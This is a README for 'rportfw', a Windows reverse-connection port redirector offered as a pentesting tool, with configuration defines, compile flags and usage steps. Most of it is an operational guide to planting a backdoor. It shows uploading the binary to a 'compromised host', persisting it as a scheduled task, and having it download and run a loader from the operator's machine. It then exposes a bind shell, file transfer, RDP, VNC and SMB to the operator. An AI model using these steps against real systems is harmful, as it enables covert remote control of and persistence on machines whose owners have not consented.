Remote port redirector by reverse connection with proxy support for Windows. Useful in pentesting.

• Reverse connection through proxy.
• Remote multi port forwarding through a single connection.
• Basic authentication.
• Encryption (optional, rc4).
• Compression (testing, zlib).
• Automatic execution of command associated to port when connecting.
• Includes starter tool loader.
• Includes auto-install function at startup (--install).

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

rportfw should compile/run on any Win32 (redirector) and UNIX/Linux box (client). You only need a relatively modern C compiler.

Download a copy of the project from github:

$ git clone https://github.com/joseigbv/rportfw.git

Edit 'rportfw.c' and change configuration (optional):

#define PROXY_HOST "10.0.0.1" 
#define PROXY_PORT 8080
#define PROXY_AUTH "TVlET01cdXNyMToxMjM0"

Compile (E.g. MinGW or cross compiling):

C:\> gcc -Wall -s -Os rportfw.c -o rportfw -lwsock32 -DLOADER

Directives:

• Run in background: -DDAEMON -mwindows
• Proxy support: -DPROXY
• Auto-download tools: -DLOADER
• Compression (miniz): -DCOMP
• Encrypt (rc4): -DCRYPT rc4.c

Edit 'client.c' and change configuration (optional):

// puerto de escucha (client)
#define HOST "0.0.0.0"
#define PORT 443 

// contrasenia cifrado
#define SKEY "secret0"

// IP bind 
#define BIND_ADDR "127.0.0.1"

// path nsh y n2f
#define LOADER_PATH "loader.exe"

// puertos a redirigir? 
#define NUM_CHAN 7
#define SET_CHANNELS(chan) { \
\
        chan[0].port = 6666; \
        chan[0].flags = X_CRYPT; \
        chan[1].port = 6667; \
        chan[1].flags = X_CRYPT; \
        chan[2].port = 6668; \
        chan[2].flags = X_CRYPT; \
        chan[3].port = 6669; \
        chan[3].flags = 0; \
        chan[4].port = 5900; \
        chan[4].flags = X_CRYPT; \
        chan[5].port = 3389; \
        chan[5].flags = 0; \
        chan[6].port = 445; \
        chan[6].flags = 0; \
}

// debug ?
#ifdef DEBUG
#define VERBOSE 1
#else
#define VERBOSE 0
#endif

Compile:

$ gcc -Wall -O2 client.c rc4.c -o client -lz -DLOADER -DCRYPT -DCOMP -DDEBUG

With 'upload.sh' you can build your set tools (loader.exe).

Upload rportfw.exe to the compromised host (%TEMP%) and execute. For better resilience, create a scheduled task:

C:\TEMP> rportfw --install

In the linux hackbox, run:

$ client 

When the compromised computer connects, it will get / execute 'loader.exe'. By default, it redirects several ports:

• 6666: micro bind shell
• 6667: redirect to upload.tmp file
• 6668: redirect from download.tmp file
• 6689: free
• 5900: redirect vnc server
• 3389: redirect rdp
• 445: redirect smb

Now, you can connect for example to RDP:

$ rdesktop localhost

• José Ignacio Bravo - Initial work - [email protected]

This project is licensed under the MIT License - see the LICENSE file for details

• Christophe Devine - ARC4 algorithm implementation
• Rich Geldreich [email protected] - miniz zlib-subset implementation
• Greg Roelofs - unzipsfx.exe